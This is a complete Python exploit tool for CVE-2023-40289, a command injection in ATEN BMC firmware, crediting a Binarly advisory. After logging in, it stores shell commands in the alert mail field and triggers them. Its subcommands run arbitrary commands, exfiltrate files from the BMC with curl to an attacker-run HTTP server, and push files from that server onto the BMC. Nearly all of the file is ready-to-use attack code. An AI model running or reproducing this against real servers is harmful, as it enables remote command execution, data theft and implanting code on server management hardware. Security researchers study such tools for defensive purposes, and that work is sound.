#!/usr/bin/env python3
"""
Exploit for CVE-2023-40289, a command injection vulnerability in ATEN's BMC firmware.

Based on information and code from https://binarly.io/advisories/BRLY-2023-001/
"""

import queue
import re
import stat
import sys
import threading
import time
import typing as t
from dataclasses import dataclass
from http.server import BaseHTTPRequestHandler, HTTPServer
from pathlib import Path, PurePosixPath

import click
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


@dataclass
class CliArgs:
    """Global CLI options shared by all subcommands."""

    target: str
    # None when --lhost was not given; command output cannot be retrieved then.
    lhost: str | None
    lport: int
    delay: int | float


class Handler(BaseHTTPRequestHandler):
    """Simple handler for HTTP requests."""

    def do_GET(self):
        """Handle an HTTP GET request. Simply return static file content."""
        self.send_response(200)  # OK
        self.send_header("Content-Type", "application/octet-stream")
        self.end_headers()
        self.wfile.write(self.server.static_content)

    def do_POST(self):
        """Handle an HTTP POST request. Store the request body in the server's queue."""
        content_length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(content_length)
        self.send_response(202)  # Accepted
        self.end_headers()
        self.server.q.put(body)

    def log_message(self, *args):
        # Noop method to silence the send_response method.
        pass


def run_http_server(
    static_content: bytes = b"",
) -> tuple[threading.Thread, queue.Queue[bytes]]:
    """Run an HTTP server in a background thread.

    This server only accepts a single request and terminates after handling it.

    Args:
        static_content: Static content to serve for GET requests.

    Returns:
        A tuple consisting of the background thread and a Queue from which the content of a
        POST request can be read.
    """
    server = HTTPServer(("", args.lport), Handler)
    # Attach a queue for communicating data back to the main thread.
    q: queue.Queue[bytes] = queue.Queue()
    server.q = q
    # Attach some static content to serve to GET requests.
    server.static_content = static_content

    def serve_once() -> None:
        # Release the listening socket as soon as the single request is done, so that a
        # later server can bind the same port again.
        try:
            server.handle_request()
        finally:
            server.server_close()

    # Run the HTTP server in a background thread.
    thread = threading.Thread(target=serve_once, daemon=True)
    thread.start()
    return thread, q


def store_payload(payload: str, index: int = 0):
    """Store the payload command in the target BMC's configuration.

    Args:
        payload: The command to run on the target BMC.
        index: Store the command at this alert index.

    Raises:
        ValueError: The payload is too long.
        RuntimeError: The target did not accept the payload.
    """
    if not payload.startswith(";"):
        payload = f";{payload}"
    if "@" not in payload:
        # The payload is only accepted if it contains an @ somewhere. Prepending an @ does
        # not do any harm, except that it increases the length. So we only do it if
        # necessary.
        payload = f"@{payload}"
    if len(payload) >= 64:
        raise ValueError(
            f"Payload too long ({len(payload)} chars). A maximum of 63 character is allowed. Sorry."
        )
    # End the command. It does not seem to hurt if this brings the payload over the length
    # limit.
    payload += ";:"

    data = {
        "op": "config_alert",
        "destination": "192.168.0.10",
        "severity": "16",
        "mail": payload,
        "sub": "test",
        "msg": "test",
        "index": str(index),
        "fun": "m",
    }
    r = session.post(url, data=data, verify=False)
    if r.status_code != 200:
        raise RuntimeError(
            f"Could not store payload {payload} at index {index}. Target returned {r.status_code} ({r.reason})."
        )


def trigger_exploit(index: int = 0) -> None:
    """Trigger running a previously stored payload command.

    Args:
        index: Trigger the command stored at this alert index.

    Raises:
        RuntimeError: The target BMC returned an unexpected error.
    """
    data = {"op": "send_test_alert", "index": str(index)}
    r = session.post(url, data=data, verify=False)
    if r.status_code != 200:
        raise RuntimeError(
            f"Could not trigger exploit at index {index}. Target returned {r.status_code} ({r.reason})."
        )


def _require_handler_url() -> str:
    """Return the URL of the local HTTP handler.

    Raises:
        click.UsageError: No local host address (--lhost) was given.
    """
    if handler_url is None:
        raise click.UsageError("This command requires the --lhost option.")
    return handler_url


def get_file(path: str | PurePosixPath, timeout: int = 15, index: int = 1) -> bytes:
    """Get the file at the given path from the BMC by triggering an upload to a local handler.

    Args:
        path: Absolute path of the file on the target BMC to get.
        timeout: How long to wait for the upload to complete (in seconds).
        index: Store the upload command at this alert index.

    Returns:
        The file's contents.

    Raises:
        click.UsageError: No local host address (--lhost) was given.
        RuntimeError: Waiting for the file upload timed out, or the local server finished
            without receiving an upload.
    """
    upload_url = _require_handler_url()
    thread, q = run_http_server()

    # Send the file to our HTTP server.
    store_payload(f"curl --data-binary @{path} {upload_url}", index=index)
    time.sleep(0.1)
    trigger_exploit(index=index)

    # Wait for the HTTP server to finish.
    thread.join(timeout)
    if thread.is_alive():
        raise RuntimeError(f"Timed out after {timeout} seconds waiting for the file upload.")

    # The server thread also ends after a request that is not a POST. Do not block forever
    # on an empty queue in that case.
    try:
        return q.get_nowait()
    except queue.Empty:
        raise RuntimeError("The local HTTP server did not receive an upload.") from None


def login(username: str, password: str) -> None:
    """Log in to the target BMC with username and password.

    Args:
        username: Log in as this user.
        password: The password for the given user.

    Raises:
        requests.ConnectionError: Could not connect to the target BMC.
        requests.HTTPError: The target BMC returned an unexpected response.
    """
    r = session.post(
        f"{args.target}/cgi/login.cgi", {"name": username, "pwd": password}, verify=False
    )
    r.raise_for_status()


def set_csrf_token():
    """Get the current CSRF token value and add it to the global session object.

    Raises:
        requests.HTTPError: The target BMC returned an unexpected response.
        RuntimeError: The response did not contain a CSRF token.
    """
    r = session.get(f"{args.target}/cgi/url_redirect.cgi?url_name=topmenu", verify=False)
    r.raise_for_status()
    m = re.search(r'SmcCsrfInsert\s*\("CSRF_TOKEN",\s*"([^"]+)"\);', r.text)
    if m is None:
        raise RuntimeError("Could not find a CSRF token in the target's response.")
    session.headers["Csrf_token"] = m.group(1)


def _disable_password_prompt(ctx: click.Context, param: click.Parameter, value: t.Any) -> t.Any:
    """Disable the interactive prompt for the (missing) --password option.

    Args:
        ctx: The current click Context.
        param: The current click Parameter.
        value: The current click parameter's value.

    Returns:
        The unchanged value.
    """
    if value:
        for p in ctx.command.params:
            if isinstance(p, click.Option) and p.name == "password":
                p.prompt = None
    return value


@click.group(
    context_settings={"auto_envvar_prefix": "BMC"},
    no_args_is_help=True,
    help=r"""Exploit CVE-2023-40289 on BMCs with ATEN firmware.

    /!\ Caution! This script will overwrite alerts without prompting! /!\
    """,
    epilog="Note: All options may also be given as environment variables with the prefix 'BMC_' (e.g. BMC_TARGET).",
)
@click.option("--target", required=True, help="URL of the target BMC's web UI.")
@click.option(
    "-h",
    "--lhost",
    help="IP address or host name of this system to get payload output. Limited to ~35 characters.",
)
@click.option(
    "-l",
    "--lport",
    default=80,
    type=click.INT,
    help="Local port to run an HTTP server on to get payload output.",
    show_default=True,
)
@click.option(
    "-s",
    "--sid",
    help="A valid session ID for an administrative user on the target system.",
    callback=_disable_password_prompt,
)
@click.option(
    "-u",
    "--username",
    help="The name of an administrative user to log in as. Ignored if --sid is given.",
)
@click.option(
    "-p",
    "--password",
    prompt=True,
    hide_input=True,
    help="The password of the given user.",
)
@click.option(
    "--delay",
    type=click.FLOAT,
    default=1.5,
    show_default=True,
    help="Delay between running a command and retrieving its output.",
)
def cli(target: str, lhost: str, lport: int, sid: str, username: str, password: str, delay: float):
    global args, url, handler_url

    # Store global CLI arguments for subcommands.
    args = CliArgs(target, lhost, lport, delay)

    # Set up some basic HTTP connection parameters.
    url = f"{target}/cgi/op.cgi"
    if sid:
        session.cookies.set("SID", sid)
    elif username and password:
        login(username, password)
    else:
        raise click.UsageError("Session ID or username and password is required.")
    set_csrf_token()
    session.headers["Referer"] = target

    if lhost:
        # Note: We intentionally omit the URL scheme to save precious payload characters.
        # Curl will figure it out.
        handler_url = lhost
        if lport != 80:
            handler_url = f"{handler_url}:{lport}"


@cli.command(context_settings={"ignore_unknown_options": True})
@click.argument("payload", nargs=-1, type=click.UNPROCESSED)
def run(payload: tuple[str, ...]):
    """Run the PAYLOAD command on the target BMC. PAYLOAD is limited to ~61 characters."""
    # click passes the words of the command as a tuple; join them into one command line.
    command = " ".join(payload)
    get_output = False

    # Mirror the truthiness test used when the handler URL is built, so an empty --lhost is
    # treated like a missing one.
    if not args.lhost:
        print("[!] Local host address not given. You will not get the output.", file=sys.stderr)
    elif len(command) < 53:
        # Looks like the payload is short enough. We'll redirect the output to a file so we
        # can get it later.
        command += "&>/tmp/x"
        get_output = True
    elif len(command) < 54:
        # Get stdout only. Better than nothing.
        command += ">/tmp/x"
        get_output = True
    else:
        # For a long payload, we can't redirect the output, because that would bring the payload
        # over the 63 character length limit.
        print("[!] Payload is too long. You will not get the output.", file=sys.stderr)

    # Run the payload.
    store_payload(command)
    print("[✓] Set payload command", file=sys.stderr)
    time.sleep(0.1)
    trigger_exploit()
    print("[✓] Triggered payload command", file=sys.stderr)

    if not get_output:
        return

    # Retrieve the output.
    time.sleep(args.delay)
    print("[.] Getting command output", file=sys.stderr)
    try:
        output = get_file("/tmp/x")
    except RuntimeError:
        print("[!] Could not get command output.", file=sys.stderr)
        return

    if output:
        try:
            # Print the output as text.
            print(output.decode(), end="")
        except UnicodeDecodeError:
            # Output is not valid UTF-8. It's probably binary data then. Output it raw.
            sys.stdout.buffer.write(output)
            sys.stdout.buffer.flush()


@cli.command()
@click.option(
    "--dest",
    default=Path("."),
    type=click.Path(path_type=Path),
    help="Local destination directory in which to store the file.",
)
@click.option(
    "--flat/--no-flat",
    default=False,
    help="Do not/do replicate the original directory structure in the destination directory.",
)
@click.argument("path", type=click.Path(path_type=PurePosixPath))
def get(path: PurePosixPath, dest: Path, flat: bool) -> int:
    """Get FILE from the target BMC and save it locally."""
    # Fail early with a usage error instead of crashing once the upload URL is needed.
    _require_handler_url()

    print(f"[.] Triggering upload of {path} from BMC.", file=sys.stderr)
    try:
        content = get_file(path)
    except RuntimeError:
        print("[!] Could not get file.", file=sys.stderr)
        # NOTE(review): click appears to ignore command return values in standalone mode,
        # so this may not become the process exit status -- confirm.
        return 1

    if not flat:
        remote_dir = path.parent
        # Strip the root so that the remote directory nests below the local destination.
        # A relative remote path is used as it is.
        if remote_dir.is_absolute():
            remote_dir = remote_dir.relative_to(remote_dir.anchor)
        dest = dest / remote_dir
    dest.mkdir(parents=True, exist_ok=True)
    dest = dest / path.name
    dest.write_bytes(content)
    print(f"[✓] File contents written to {dest}.", file=sys.stderr)
    return 0


def _run_stored_payload(index: int, success: str, failure: str) -> None:
    """Trigger the payload stored at an alert index and report on its captured output.

    The stored payloads redirect their output to /tmp/x on the BMC. Any output is treated
    as a failure.

    Args:
        index: Trigger the command stored at this alert index.
        success: Message to print if the command produced no output.
        failure: Message to print, followed by the output, if the command produced output.
    """
    trigger_exploit(index=index)
    time.sleep(args.delay)
    try:
        output = get_file("/tmp/x", index=3)
    except RuntimeError:
        print("[!] Could not get command output.", file=sys.stderr)
        return

    if output:
        print(failure, file=sys.stderr)
        # Never let undecodable bytes in the output crash the error report.
        print(output.decode(errors="replace"), end="", file=sys.stderr)
    else:
        print(success, file=sys.stderr)


@cli.command()
@click.argument("file", type=click.Path(exists=True, dir_okay=False, path_type=Path))
@click.argument("dest", type=click.Path(path_type=PurePosixPath))
def put(file: Path, dest: PurePosixPath) -> int:
    """Write local FILE to the BMC at DEST. Will restore local permissions on the target."""
    download_url = _require_handler_url()
    content = file.read_bytes()
    mode = stat.S_IMODE(file.stat().st_mode)
    # The chmod step is skipped for mode 0o644.
    restore_mode = mode != 0o644

    # Download the file from our HTTP server.
    store_payload(f"curl -o /tmp/dl {download_url} &>/tmp/x", index=0)
    if restore_mode:
        store_payload(f"chmod {mode:o} /tmp/dl &>/tmp/x", index=1)
    store_payload(f"mv /tmp/dl {dest} &>/tmp/x", index=2)
    print("[✓] Set download payloads", file=sys.stderr)
    time.sleep(0.1)

    thread, _ = run_http_server(content)
    trigger_exploit(index=0)

    # Wait for the HTTP server to finish.
    thread.join(15)
    if thread.is_alive():
        print("[!] BMC did not download file.", file=sys.stderr)
        return 1
    print(f"[✓] Downloaded {file} to BMC.", file=sys.stderr)

    if restore_mode:
        _run_stored_payload(
            index=1,
            success="[✓] Set file mode.",
            failure="[!] Could not set file mode.",
        )

    _run_stored_payload(
        index=2,
        success=f"[✓] Moved downloaded file to {dest} on BMC.",
        failure=f"[!] Could not move downloaded file to {dest} on BMC.",
    )

    return 0


# Define some global variables used throughout this script.
args: CliArgs
url: str
session = requests.Session()
# Stays None unless --lhost is given; commands that need it must check first.
handler_url: str | None = None


if __name__ == "__main__":
    cli()